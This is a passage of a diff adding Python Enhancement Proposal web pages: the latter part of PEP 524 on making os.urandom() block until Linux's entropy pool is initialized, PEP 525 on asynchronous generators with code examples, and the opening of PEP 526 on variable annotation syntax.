Don’t use /dev/random but /dev/urandom

+

The /dev/random device should only be used for very specific use cases. Reading from /dev/random on Linux is likely to block. Users don't like when an application blocks longer than 5 seconds to generate a secret. It is only expected for specific cases like explicitly generating an encryption key.

+

When the system has no available entropy, choosing between blocking +until entropy is available or falling back on lower quality entropy is a +matter of compromise between security and practicability. The choice +depends on the use case.

+

On Linux, /dev/urandom is secure, it should be used instead of +/dev/random. See Myths about /dev/urandom by Thomas Hühn: “Fact: +/dev/urandom is the preferred source of cryptographic randomness on +UNIX-like systems”

+
+
+

getrandom(size, 0) can block forever on Linux

+

The origin of the Python issue #26839 is the Debian bug report #822431: in fact, getrandom(size, 0) blocks forever on the virtual machine. The system managed to boot because systemd killed the blocked process after 90 seconds.

+

Solutions like Load entropy from disk at boot reduce the risk of this bug.

+
+
+
+

Rationale

+

On Linux, reading /dev/urandom can return “weak” entropy before urandom is fully initialized, i.e. before the kernel has collected 128 bits of entropy. Linux 3.17 adds a new getrandom() syscall which makes it possible to block until urandom is initialized.

+

On Python 3.5.2, os.urandom() uses getrandom(size, GRND_NONBLOCK), but falls back on reading the non-blocking /dev/urandom if getrandom(size, GRND_NONBLOCK) fails with EAGAIN.

+

Security experts promote os.urandom() for generating cryptographic keys because it is implemented with a Cryptographically secure pseudo-random number generator (CSPRNG). By the way, os.urandom() is preferred over ssl.RAND_bytes() for different reasons.

+

This PEP proposes to modify os.urandom() to use getrandom() in +blocking mode to not return weak entropy, but also ensure that Python +will not block at startup.

+
+
+

Changes

+
+

Make os.urandom() blocking on Linux

+

All changes described in this section are specific to the Linux +platform.

+

Changes:

+
    +
  • Modify os.urandom() to block until system urandom is initialized: os.urandom() (C function _PyOS_URandom()) is modified to always call getrandom(size, 0) (blocking mode) on Linux and Solaris.
  • Add a new private _PyOS_URandom_Nonblocking() function: try to call getrandom(size, GRND_NONBLOCK) on Linux and Solaris, but fall back on reading /dev/urandom if it fails with EAGAIN.
  • Initialize the hash secret from non-blocking system urandom: _PyRandom_Init() is modified to call _PyOS_URandom_Nonblocking().
  • The random.Random constructor now uses non-blocking system urandom: it is modified to use the new _PyOS_URandom_Nonblocking() function internally to seed the RNG.
+
+
+

Add a new os.getrandom() function

+

A new os.getrandom(size, flags=0) function is added: use +getrandom() syscall on Linux and getrandom() C function on +Solaris.

+

The function comes with 2 new flags:

+
    +
  • os.GRND_RANDOM: read bytes from /dev/random rather than reading /dev/urandom
  • os.GRND_NONBLOCK: raise a BlockingIOError if os.getrandom() would block
+

The os.getrandom() function is a thin wrapper on the getrandom() syscall/C function and so inherits its behaviour. For example, on Linux, it can return fewer bytes than requested if the syscall is interrupted by a signal.
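
+

For example, a caller that needs exactly n bytes has to loop. A small sketch (assuming a platform where os.getrandom() is available; getrandom_exact is a hypothetical helper name):

+
import os
+
+def getrandom_exact(n):
+    # getrandom() may return fewer bytes than requested (e.g. when
+    # interrupted by a signal), so keep reading until n bytes are collected.
+    buf = bytearray()
+    while len(buf) < n:
+        buf += os.getrandom(n - len(buf))
+    return bytes(buf)
+
+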

+
+
+
+

Examples using os.getrandom()

+
+

Best-effort RNG

+

Example of a portable non-blocking RNG function: try to get random bytes +from the OS urandom, or fallback on the random module.

+
import os
+import random
+
+def best_effort_rng(size):
+    # getrandom() is only available on Linux and Solaris
+    if not hasattr(os, 'getrandom'):
+        return os.urandom(size)
+
+    result = bytearray()
+    try:
+        # need a loop because getrandom() can return less bytes than
+        # requested for different reasons
+        while size:
+            data = os.getrandom(size, os.GRND_NONBLOCK)
+            result += data
+            size -= len(data)
+    except BlockingIOError:
+        # OS urandom is not initialized yet:
+        # fallback on the Python random module
+        data = bytes(random.randrange(256) for byte in range(size))
+        result += data
+    return bytes(result)
+
+
+

This function can block in theory on a platform where +os.getrandom() is not available but os.urandom() can block.

+
+
+

wait_for_system_rng()

+

Example of function waiting timeout seconds until the OS urandom is +initialized on Linux or Solaris:

+
import os
+import time
+
+def wait_for_system_rng(timeout, interval=1.0):
+    if not hasattr(os, 'getrandom'):
+        return
+
+    deadline = time.monotonic() + timeout
+    while True:
+        try:
+            os.getrandom(1, os.GRND_NONBLOCK)
+        except BlockingIOError:
+            pass
+        else:
+            return
+
+        if time.monotonic() > deadline:
+            raise Exception('OS urandom not initialized after %s seconds'
+                            % timeout)
+
+        time.sleep(interval)
+
+
+

This function is not portable. For example, os.urandom() can block +on FreeBSD in theory, at the early stage of the system initialization.

+
+
+

Create a best-effort RNG

+

Simpler example to create a non-blocking RNG on Linux: choose between random.SystemRandom and random.Random depending on whether getrandom() would block.

+
import os
+import random
+
+def create_nonblocking_random():
+    if not hasattr(os, 'getrandom'):
+        return random.Random()
+
+    try:
+        os.getrandom(1, os.GRND_NONBLOCK)
+    except BlockingIOError:
+        return random.Random()
+    else:
+        return random.SystemRandom()
+
+
+

This function is not portable. For example, random.SystemRandom +can block on FreeBSD in theory, at the early stage of the system +initialization.

+
+
+
+

Alternative

+
+

Leave os.urandom() unchanged, add os.getrandom()

+

os.urandom() remains unchanged: it never blocks, but it can return weak entropy if system urandom is not initialized yet.

+

Only add the new os.getrandom() function (wrapper to the +getrandom() syscall/C function).

+

The secrets.token_bytes() function should be used to write portable +code.
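
+

For example, a portable way to obtain 16 secure random bytes (the secrets module was added in Python 3.6):

+
import secrets
+
+token = secrets.token_bytes(16)  # bytes from the most secure source available
+
+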

+

The problem with this change is that it expects users to understand security well and to know each platform well. Python has the tradition of hiding “implementation details”. For example, os.urandom() is not a thin wrapper to the /dev/urandom device: it uses CryptGenRandom() on Windows, it uses getentropy() on OpenBSD, it tries getrandom() on Linux and Solaris or falls back on reading /dev/urandom. Python already uses the best available system RNG depending on the platform.

+

This PEP does not change the API:

+
    +
  • os.urandom(), random.SystemRandom and secrets for security
  • random module (except random.SystemRandom) for all other usages
+
+
+

Raise BlockingIOError in os.urandom()

+
+

Proposition

+

PEP 522: Allow BlockingIOError in security sensitive APIs on Linux.

+

Python should not decide for the developer how to handle The bug: raising a BlockingIOError immediately if os.urandom() is going to block allows developers to choose how to handle this case:

+
    +
  • catch the exception and fall back to a non-secure entropy source: read /dev/urandom on Linux, use the Python random module (which is not secure at all), use time, use the process identifier, etc.
  • don't catch the error, and let the whole program fail with this fatal exception
+

More generally, the exception helps to notify when something goes wrong. The application can emit a warning when it starts to wait for os.urandom().

+
+
+

Criticism

+

For the use case 2 (web server), falling back on non-secure entropy is +not acceptable. The application must handle BlockingIOError: poll +os.urandom() until it completes. Example:

+
def secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        pass
+
+    print("Wait for system urandom initialization: move your "
+          "mouse, use your keyboard, use your disk, ...")
+    while 1:
+        # Avoid busy-loop: sleep 1 ms
+        time.sleep(0.001)
+        try:
+            return os.urandom(n)
+        except BlockingIOError:
+            pass
+
+
+

For correctness, all applications which must generate a secure secret +must be modified to handle BlockingIOError even if The bug is +unlikely.

+

The case of applications which use os.urandom() but don't really require security is not well defined. Maybe these applications should not use os.urandom() in the first place, but always the non-blocking random module. If os.urandom() is used for security, we are back to the use case 2 described above (Use Case 2: Web server). If a developer doesn't want to drop os.urandom(), the code should be modified. Example:

+
def almost_secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        return bytes(random.randrange(256) for byte in range(n))
+
+
+

The question is if The bug is common enough to require that so many +applications have to be modified.

+

Another simpler choice is to refuse to start before the system urandom +is initialized:

+
def secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        print("Fatal error: the system urandom is not initialized")
+        print("Wait a bit, and rerun the program later.")
+        sys.exit(1)
+
+
+

Compared to Python 2.7, Python 3.4 and Python 3.5.2, where os.urandom() never blocks nor raises an exception on Linux, such a behaviour change can be seen as a major regression.

+
+
+
+

Add an optional block parameter to os.urandom()

+

See the issue #27250: Add os.urandom_block().

+

Add an optional block parameter to os.urandom(). The default value may +be True (block by default) or False (non-blocking).

+

The first technical issue is to implement os.urandom(block=False) on +all platforms. Only Linux 3.17 (and newer) and Solaris 11.3 (and newer) +have a well defined non-blocking API (getrandom(size, +GRND_NONBLOCK)).

+

As with Raise BlockingIOError in os.urandom(), it doesn't seem worth it to make the API more complex for a theoretical (or at least very rare) use case.

+

As with Leave os.urandom() unchanged, add os.getrandom(), the problem is that it makes the API more complex and so more error-prone.

+
+
+
+

Acceptance

+

The PEP was accepted on 2016-08-08 by Guido van Rossum.

+
+
+

Annexes

+
+

Operating system random functions

+

os.urandom() uses the following functions:

+ +

On Linux, commands to get the status of /dev/random (results are +number of bytes):

+
$ cat /proc/sys/kernel/random/entropy_avail
+2850
+$ cat /proc/sys/kernel/random/poolsize
+4096
+
+
+
+
+

Why using os.urandom()?

+

Since os.urandom() is implemented in the kernel, it doesn't have the issues of a user-space RNG. For example, it is much harder to get its state. It is usually built on a CSPRNG, so even if its state is “stolen”, it is hard to compute previously generated numbers. The kernel has good knowledge of entropy sources and regularly feeds the entropy pool.

+

That’s also why os.urandom() is preferred over ssl.RAND_bytes().

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0524.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0525/index.html b/pep-0525/index.html new file mode 100644 index 00000000000..eacfd35efff --- /dev/null +++ b/pep-0525/index.html @@ -0,0 +1,750 @@ + + + + + + + + PEP 525 – Asynchronous Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 525 – Asynchronous Generators

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Jul-2016
+
Python-Version:
+
3.6
+
Post-History:
+
02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 492 introduced support for native coroutines and async/await +syntax to Python 3.5. It is proposed here to extend Python’s +asynchronous capabilities by adding support for +asynchronous generators.

+
+
+

Rationale and Goals

+

Regular generators (introduced in PEP 255) enabled an elegant way of writing complex data producers, having them behave like an iterator.

+

However, currently there is no equivalent concept for the asynchronous +iteration protocol (async for). This makes writing asynchronous +data producers unnecessarily complex, as one must define a class that +implements __aiter__ and __anext__ to be able to use it in +an async for statement.

+

Essentially, the goals and rationale for PEP 255, applied to the +asynchronous execution case, hold true for this proposal as well.

+

Performance is an additional point for this proposal: in our testing of +the reference implementation, asynchronous generators are 2x faster +than an equivalent implemented as an asynchronous iterator.

+

As an illustration of the code quality improvement, consider the +following class that prints numbers with a given delay once iterated:

+
class Ticker:
+    """Yield numbers from 0 to `to` every `delay` seconds."""
+
+    def __init__(self, delay, to):
+        self.delay = delay
+        self.i = 0
+        self.to = to
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        i = self.i
+        if i >= self.to:
+            raise StopAsyncIteration
+        self.i += 1
+        if i:
+            await asyncio.sleep(self.delay)
+        return i
+
+
+

The same can be implemented as a much simpler asynchronous generator:

+
async def ticker(delay, to):
+    """Yield numbers from 0 to `to` every `delay` seconds."""
+    for i in range(to):
+        yield i
+        await asyncio.sleep(delay)
+
+
+
+
+

Specification

+

This proposal introduces the concept of asynchronous generators to +Python.

+

This specification presumes knowledge of the implementation of +generators and coroutines in Python (PEP 342, PEP 380 and PEP 492).

+
+

Asynchronous Generators

+

A Python generator is any function containing one or more yield +expressions:

+
def func():            # a function
+    return
+
+def genfunc():         # a generator function
+    yield
+
+
+

We propose to use the same approach to define +asynchronous generators:

+
async def coro():      # a coroutine function
+    await smth()
+
+async def asyncgen():  # an asynchronous generator function
+    await smth()
+    yield 42
+
+
+

The result of calling an asynchronous generator function is +an asynchronous generator object, which implements the asynchronous +iteration protocol defined in PEP 492.

+

It is a SyntaxError to have a non-empty return statement in an +asynchronous generator.
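
+

For example, the following definition is rejected at compile time:

+
async def invalid():
+    yield 42
+    return 42  # SyntaxError: non-empty return inside an asynchronous generator
+
+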

+
+
+

Support for Asynchronous Iteration Protocol

+

The protocol requires two special methods to be implemented:

+
    +
  1. An __aiter__ method returning an asynchronous iterator.
  2. An __anext__ method returning an awaitable object, which uses a StopIteration exception to “yield” values, and a StopAsyncIteration exception to signal the end of the iteration.
+

Asynchronous generators define both of these methods. Let’s manually +iterate over a simple asynchronous generator:

+
async def genfunc():
+    yield 1
+    yield 2
+
+gen = genfunc()
+
+assert gen.__aiter__() is gen
+
+assert await gen.__anext__() == 1
+assert await gen.__anext__() == 2
+
+await gen.__anext__()  # This line will raise StopAsyncIteration.
+
+
+
+
+

Finalization

+

PEP 492 requires an event loop or a scheduler to run coroutines. +Because asynchronous generators are meant to be used from coroutines, +they also require an event loop to run and finalize them.

+

Asynchronous generators can have try..finally blocks, as well as +async with. It is important to provide a guarantee that, even +when partially iterated, and then garbage collected, generators can +be safely finalized. For example:

+
async def square_series(con, to):
+    async with con.transaction():
+        cursor = con.cursor(
+            'SELECT generate_series(0, $1) AS i', to)
+        async for row in cursor:
+            yield row['i'] ** 2
+
+async for i in square_series(con, 1000):
+    if i == 100:
+        break
+
+
+

The above code defines an asynchronous generator that uses +async with to iterate over a database cursor in a transaction. +The generator is then iterated over with async for, which interrupts +the iteration at some point.

+

The square_series() generator will then be garbage collected, and without a mechanism to asynchronously close the generator, the Python interpreter would not be able to do anything.

+

To solve this problem we propose to do the following:

+
    +
  1. Implement an aclose method on asynchronous generators +returning a special awaitable. When awaited it +throws a GeneratorExit into the suspended generator and +iterates over it until either a GeneratorExit or +a StopAsyncIteration occur.

    This is very similar to what the close() method does to regular +Python generators, except that an event loop is required to execute +aclose().

    +
  2. Raise a RuntimeError, when an asynchronous generator executes a yield expression in its finally block (using await is fine, though):
    async def gen():
    +    try:
    +        yield
    +    finally:
    +        await asyncio.sleep(1)   # Can use 'await'.
    +
    +        yield                    # Cannot use 'yield',
    +                                 # this line will trigger a
    +                                 # RuntimeError.
    +
    +
    +
  3. Add two new methods to the sys module: set_asyncgen_hooks() and get_asyncgen_hooks().
+

The idea behind sys.set_asyncgen_hooks() is to allow event +loops to intercept asynchronous generators iteration and finalization, +so that the end user does not need to care about the finalization +problem, and everything just works.

+

sys.set_asyncgen_hooks() accepts two arguments:

+
    +
  • firstiter: a callable which will be called when an asynchronous generator is iterated for the first time.
  • finalizer: a callable which will be called when an asynchronous generator is about to be GCed.
+

When an asynchronous generator is iterated for the first time, +it stores a reference to the current finalizer.

+

When an asynchronous generator is about to be garbage collected, +it calls its cached finalizer. The assumption is that the finalizer +will schedule an aclose() call with the loop that was active +when the iteration started.

+

For instance, here is how asyncio is modified to allow safe +finalization of asynchronous generators:

+
# asyncio/base_events.py
+
+class BaseEventLoop:
+
+    def run_forever(self):
+        ...
+        old_hooks = sys.get_asyncgen_hooks()
+        sys.set_asyncgen_hooks(finalizer=self._finalize_asyncgen)
+        try:
+            ...
+        finally:
+            sys.set_asyncgen_hooks(*old_hooks)
+            ...
+
+    def _finalize_asyncgen(self, gen):
+        self.create_task(gen.aclose())
+
+
+

The second argument, firstiter, allows event loops to maintain +a weak set of asynchronous generators instantiated under their control. +This makes it possible to implement “shutdown” mechanisms to safely +finalize all open generators and close the event loop.
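
+

A sketch (the TrackingLoop class is hypothetical, loosely modelled on the asyncio code above) of how an event loop might use firstiter for this purpose:

+
import weakref
+
+class TrackingLoop:
+    def __init__(self):
+        self._asyncgens = weakref.WeakSet()
+
+    def _asyncgen_firstiter_hook(self, agen):
+        # Remember every asynchronous generator first iterated under this loop.
+        self._asyncgens.add(agen)
+
+    def shutdown(self):
+        # At shutdown, every still-alive generator can be scheduled to aclose().
+        return [agen.aclose() for agen in self._asyncgens]
+
+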

+

sys.set_asyncgen_hooks() is thread-specific, so several event +loops running in parallel threads can use it safely.

+

sys.get_asyncgen_hooks() returns a namedtuple-like structure +with firstiter and finalizer fields.
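
+

For instance, the current hooks can be saved and later restored (my_firstiter and my_finalizer stand in for arbitrary user callables):

+
import sys
+
+def my_firstiter(agen): pass   # stand-in user callables
+def my_finalizer(agen): pass
+
+old = sys.get_asyncgen_hooks()  # namedtuple-like: (firstiter, finalizer)
+try:
+    sys.set_asyncgen_hooks(firstiter=my_firstiter, finalizer=my_finalizer)
+    # ... run code that iterates asynchronous generators ...
+finally:
+    sys.set_asyncgen_hooks(*old)
+
+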

+
+
+

asyncio

+

The asyncio event loop will use sys.set_asyncgen_hooks() API to +maintain a weak set of all scheduled asynchronous generators, and to +schedule their aclose() coroutine methods when it is time for +generators to be GCed.

+

To make sure that asyncio programs can finalize all scheduled +asynchronous generators reliably, we propose to add a new event loop +coroutine method loop.shutdown_asyncgens(). The method will +schedule all currently open asynchronous generators to close with an +aclose() call.

+

After calling the loop.shutdown_asyncgens() method, the event loop +will issue a warning whenever a new asynchronous generator is iterated +for the first time. The idea is that after requesting all asynchronous +generators to be shutdown, the program should not execute code that +iterates over new asynchronous generators.

+

An example of how shutdown_asyncgens coroutine should be used:

+
try:
+    loop.run_forever()
+finally:
+    loop.run_until_complete(loop.shutdown_asyncgens())
+    loop.close()
+
+
+
+
+

Asynchronous Generator Object

+

The object is modeled after the standard Python generator object. +Essentially, the behaviour of asynchronous generators is designed +to replicate the behaviour of synchronous generators, with the only +difference in that the API is asynchronous.

+

The following methods and properties are defined:

+
    +
  1. agen.__aiter__(): Returns agen.
  2. agen.__anext__(): Returns an awaitable, that performs one asynchronous generator iteration when awaited.
  3. agen.asend(val): Returns an awaitable, that pushes the val object into the agen generator. When the agen has not yet been iterated, val must be None.

    Example:

    +
    async def gen():
    +    await asyncio.sleep(0.1)
    +    v = yield 42
    +    print(v)
    +    await asyncio.sleep(0.2)
    +
    +g = gen()
    +
    +await g.asend(None)      # Will return 42 after sleeping
    +                         # for 0.1 seconds.
    +
    +await g.asend('hello')   # Will print 'hello' and
    +                         # raise StopAsyncIteration
    +                         # (after sleeping for 0.2 seconds.)
    +
    +
    +
  4. agen.athrow(typ, [val, [tb]]): Returns an awaitable, that throws an exception into the agen generator.

    Example:

    +
    async def gen():
    +    try:
    +        await asyncio.sleep(0.1)
    +        yield 'hello'
    +    except ZeroDivisionError:
    +        await asyncio.sleep(0.2)
    +        yield 'world'
    +
    +g = gen()
    +v = await g.asend(None)
    +print(v)                # Will print 'hello' after
    +                        # sleeping for 0.1 seconds.
    +
    +v = await g.athrow(ZeroDivisionError)
    +print(v)                # Will print 'world' after
    +                        # sleeping 0.2 seconds.
    +
    +
    +
  5. agen.aclose(): Returns an awaitable, that throws a GeneratorExit exception into the generator. The awaitable can either return a yielded value, if agen handled the exception, or agen will be closed and the exception will propagate back to the caller.
  6. agen.__name__ and agen.__qualname__: readable and writable name and qualified name attributes.
  7. agen.ag_await: The object that agen is currently awaiting on, or None. This is similar to the currently available gi_yieldfrom for generators and cr_await for coroutines.
  8. agen.ag_frame, agen.ag_running, and agen.ag_code: defined in the same way as similar attributes of standard generators.
+

StopIteration and StopAsyncIteration are not propagated out of +asynchronous generators, and are replaced with a RuntimeError.
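
+

A small illustration of this behaviour (written in the event-loop style of the other examples in this PEP):

+
import asyncio
+
+async def gen():
+    raise StopIteration  # will surface to the caller as a RuntimeError
+    yield
+
+async def demo():
+    try:
+        await gen().__anext__()
+    except RuntimeError as exc:
+        print('caught:', exc)
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(demo())
+
+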

+
+
+

Implementation Details

+

Asynchronous generator object (PyAsyncGenObject) shares the +struct layout with PyGenObject. In addition to that, the +reference implementation introduces three new objects:

+
    +
  1. PyAsyncGenASend: the awaitable object that implements +__anext__ and asend() methods.
  2. PyAsyncGenAThrow: the awaitable object that implements athrow() and aclose() methods.
  3. _PyAsyncGenWrappedValue: every directly yielded object from an asynchronous generator is implicitly boxed into this structure. This is how the generator implementation can separate objects that are yielded using the regular iteration protocol from objects that are yielded using the asynchronous iteration protocol.
+

PyAsyncGenASend and PyAsyncGenAThrow are awaitables (they have +__await__ methods returning self) and are coroutine-like objects +(implementing __iter__, __next__, send() and throw() +methods). Essentially, they control how asynchronous generators are +iterated:

+../_images/pep-0525-1.png + +
+

PyAsyncGenASend and PyAsyncGenAThrow

+

PyAsyncGenASend is a coroutine-like object that drives __anext__ +and asend() methods and implements the asynchronous iteration +protocol.

+

agen.asend(val) and agen.__anext__() return instances of +PyAsyncGenASend (which hold references back to the parent +agen object.)

+

The data flow is defined as follows:

+
    +
  1. When PyAsyncGenASend.send(val) is called for the first time, +val is pushed to the parent agen object (using existing +facilities of PyGenObject.)

    Subsequent iterations over the PyAsyncGenASend objects push None to agen.

    +

    When a _PyAsyncGenWrappedValue object is yielded, it +is unboxed, and a StopIteration exception is raised with the +unwrapped value as an argument.

    +
  2. When PyAsyncGenASend.throw(*exc) is called for the first time, *exc is thrown into the parent agen object.

    Subsequent iterations over the PyAsyncGenASend objects push None to agen.

    +

    When a _PyAsyncGenWrappedValue object is yielded, it +is unboxed, and a StopIteration exception is raised with the +unwrapped value as an argument.

    +
  3. return statements in asynchronous generators raise a StopAsyncIteration exception, which is propagated through the PyAsyncGenASend.send() and PyAsyncGenASend.throw() methods.
+

PyAsyncGenAThrow is very similar to PyAsyncGenASend. The only +difference is that PyAsyncGenAThrow.send(), when called first time, +throws an exception into the parent agen object (instead of pushing +a value into it.)

+
+
+
+

New Standard Library Functions and Types

+
    +
  1. types.AsyncGeneratorType – type of asynchronous generator +object.
  2. sys.set_asyncgen_hooks() and sys.get_asyncgen_hooks() methods to set up asynchronous generators finalizers and iteration interceptors in event loops.
  3. inspect.isasyncgen() and inspect.isasyncgenfunction() introspection functions.
  4. New method for asyncio event loop: loop.shutdown_asyncgens().
  5. New collections.abc.AsyncGenerator abstract base class.
+
+
+

Backwards Compatibility

+

The proposal is fully backwards compatible.

+

In Python 3.5 it is a SyntaxError to define an async def +function with a yield expression inside, therefore it’s safe to +introduce asynchronous generators in 3.6.

+
+
+
+

Performance

+
+

Regular Generators

+

There is no performance degradation for regular generators. +The following micro benchmark runs at the same speed on CPython with +and without asynchronous generators:

+
def gen():
+    i = 0
+    while i < 100000000:
+        yield i
+        i += 1
+
+list(gen())
+
+
+
+
+

Improvements over asynchronous iterators

+

The following micro-benchmark shows that asynchronous generators +are about 2.3x faster than asynchronous iterators implemented in +pure Python:

+
N = 10 ** 7
+
+async def agen():
+    for i in range(N):
+        yield i
+
+class AIter:
+    def __init__(self):
+        self.i = 0
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        i = self.i
+        if i >= N:
+            raise StopAsyncIteration
+        self.i += 1
+        return i
+
+
+
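
+

A possible driver for these micro-benchmarks (a sketch; it assumes the agen and AIter definitions above and simply times one full iteration of each):

+
import asyncio
+import time
+
+async def consume(ait):
+    async for _ in ait:
+        pass
+
+loop = asyncio.get_event_loop()
+for name, factory in [('async generator', agen), ('async iterator', AIter)]:
+    start = time.monotonic()
+    loop.run_until_complete(consume(factory()))
+    print(name, time.monotonic() - start)
+
+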
+
+
+

Design Considerations

+
+

aiter() and anext() builtins

+

Originally, PEP 492 defined __aiter__ as a method that should +return an awaitable object, resulting in an asynchronous iterator.

+

However, in CPython 3.5.2, __aiter__ was redefined to return +asynchronous iterators directly. To avoid breaking backwards +compatibility, it was decided that Python 3.6 will support both +ways: __aiter__ can still return an awaitable with +a DeprecationWarning being issued.

+

Because of this dual nature of __aiter__ in Python 3.6, we cannot +add a synchronous implementation of aiter() built-in. Therefore, +it is proposed to wait until Python 3.7.

+
+
+

Asynchronous list/dict/set comprehensions

+

Syntax for asynchronous comprehensions is unrelated to the asynchronous +generators machinery, and should be considered in a separate PEP.

+
+
+

Asynchronous yield from

+

While it is theoretically possible to implement yield from support +for asynchronous generators, it would require a serious redesign of the +generators implementation.

+

yield from is also less critical for asynchronous generators, since there is no need to provide a mechanism for implementing another coroutine protocol on top of coroutines. And to compose asynchronous generators, a simple async for loop can be used:

+
async def g1():
+    yield 1
+    yield 2
+
+async def g2():
+    async for v in g1():
+        yield v
+
+
+
+
+

Why the asend() and athrow() methods are necessary

+

They make it possible to implement concepts similar to +contextlib.contextmanager using asynchronous generators. +For instance, with the proposed design, it is possible to implement +the following pattern:

+
@async_context_manager
+async def ctx():
+    await open()
+    try:
+        yield
+    finally:
+        await close()
+
+async with ctx():
+    await ...
+
+
+

Another reason is that it is possible to push data and throw exceptions into asynchronous generators using the object returned from __anext__, but it is hard to do that correctly. Adding explicit asend() and athrow() will pave a safe way to accomplish that.

+

In terms of implementation, asend() is a slightly more generic +version of __anext__, and athrow() is very similar to +aclose(). Therefore, having these methods defined for asynchronous +generators does not add any extra complexity.
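
+

For illustration, here is a minimal sketch of what such an async_context_manager decorator could look like (hypothetical code, not part of this PEP; contextlib.asynccontextmanager later filled this role in Python 3.7):

+
class _AsyncGenContextManager:
+    def __init__(self, agen):
+        self._agen = agen
+
+    async def __aenter__(self):
+        # Run the generator up to its first (and only) yield.
+        return await self._agen.asend(None)
+
+    async def __aexit__(self, typ, val, tb):
+        if typ is None:
+            # Resume after the yield; the generator must now finish.
+            try:
+                await self._agen.asend(None)
+            except StopAsyncIteration:
+                return False
+            raise RuntimeError("async generator didn't stop")
+        # Deliver the exception to the yield point inside the generator.
+        try:
+            await self._agen.athrow(typ, val, tb)
+        except StopAsyncIteration:
+            return True    # the generator handled the exception
+        return False       # otherwise re-raise the original exception
+
+def async_context_manager(func):
+    def helper(*args, **kwargs):
+        return _AsyncGenContextManager(func(*args, **kwargs))
+    return helper
+
+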

+
+
+
+

Example

+

A working example with the current reference implementation (will +print numbers from 0 to 9 with one second delay):

+
async def ticker(delay, to):
+    for i in range(to):
+        yield i
+        await asyncio.sleep(delay)
+
+
+async def run():
+    async for i in ticker(1, 10):
+        print(i)
+
+
+import asyncio
+loop = asyncio.get_event_loop()
+try:
+    loop.run_until_complete(run())
+finally:
+    loop.close()
+
+
+
+
+

Acceptance

+

PEP 525 was accepted by Guido, September 6, 2016 [2].

+
+
+

Implementation

+

The implementation is tracked in issue 28003 [3]. The reference +implementation git repository is available at [1].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner, Elvis Pranskevichus, +Nathaniel Smith, Łukasz Langa, Andrew Svetlov and many others +for their feedback, code reviews, and discussions around this +PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0525.rst

+

Last modified: 2024-11-06 14:44:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0526/index.html b/pep-0526/index.html new file mode 100644 index 00000000000..dcb7a68faa6 --- /dev/null +++ b/pep-0526/index.html @@ -0,0 +1,800 @@ + + + + + + + + PEP 526 – Syntax for Variable Annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 526 – Syntax for Variable Annotations

+
+
Author:
+
Ryan Gonzalez <rymg19 at gmail.com>, Philip House <phouse512 at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Lisa Roach <lisaroach14 at gmail.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
09-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
30-Aug-2016, 02-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Annotated assignment statements, +ClassVar and +typing.ClassVar for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Status

+

This PEP has been provisionally accepted by the BDFL. +See the acceptance message for more color: +https://mail.python.org/pipermail/python-dev/2016-September/146282.html

+
+
+

Notice for Reviewers

+

This PEP was drafted in a separate repo: +https://github.com/phouse512/peps/tree/pep-0526.

+

There was preliminary discussion on python-ideas and at +https://github.com/python/typing/issues/258.

+

Before you bring up an objection in a public forum please at least +read the summary of rejected ideas listed at the end of this PEP.

+
+
+

Abstract

+

PEP 484 introduced type hints, a.k.a. type annotations. While its +main focus was function annotations, it also introduced the notion of +type comments to annotate variables:

+
# 'primes' is a list of integers
+primes = []  # type: List[int]
+
+# 'captain' is a string (Note: initial value is a problem)
+captain = ...  # type: str
+
+class Starship:
+    # 'stats' is a class variable
+    stats = {}  # type: Dict[str, int]
+
+
+

This PEP aims at adding syntax to Python for annotating the types of variables +(including class variables and instance variables), +instead of expressing them through comments:

+
primes: List[int] = []
+
+captain: str  # Note: no initial value!
+
+class Starship:
+    stats: ClassVar[Dict[str, int]] = {}
+
+
+

PEP 484 explicitly states that type comments are intended to help with +type inference in complex cases, and this PEP does not change this +intention. However, since in practice type comments have also been +adopted for class variables and instance variables, this PEP also +discusses the use of type annotations for those variables.

+
+
+

Rationale

+

Although type comments work well enough, the fact that they’re +expressed through comments has some downsides:

+
    +
  • Text editors often highlight comments differently from type annotations.
  • There's no way to annotate the type of an undefined variable; one needs to initialize it to None (e.g. a = None # type: int).
  • Variables annotated in a conditional branch are difficult to read:
    if some_value:
    +    my_var = function() # type: Logger
    +else:
    +    my_var = another_function() # Why isn't there a type here?
    +
    +
    +
  • Since type comments aren't actually part of the language, if a Python script wants to parse them, it requires a custom parser instead of just using ast.
  • Type comments are used a lot in typeshed. Migrating typeshed to use +the variable annotation syntax instead of type comments would improve +readability of stubs.
  • In situations where normal comments and type comments are used together, it is +difficult to distinguish them:
    path = None  # type: Optional[str]  # Path to module source
    +
    +
    +
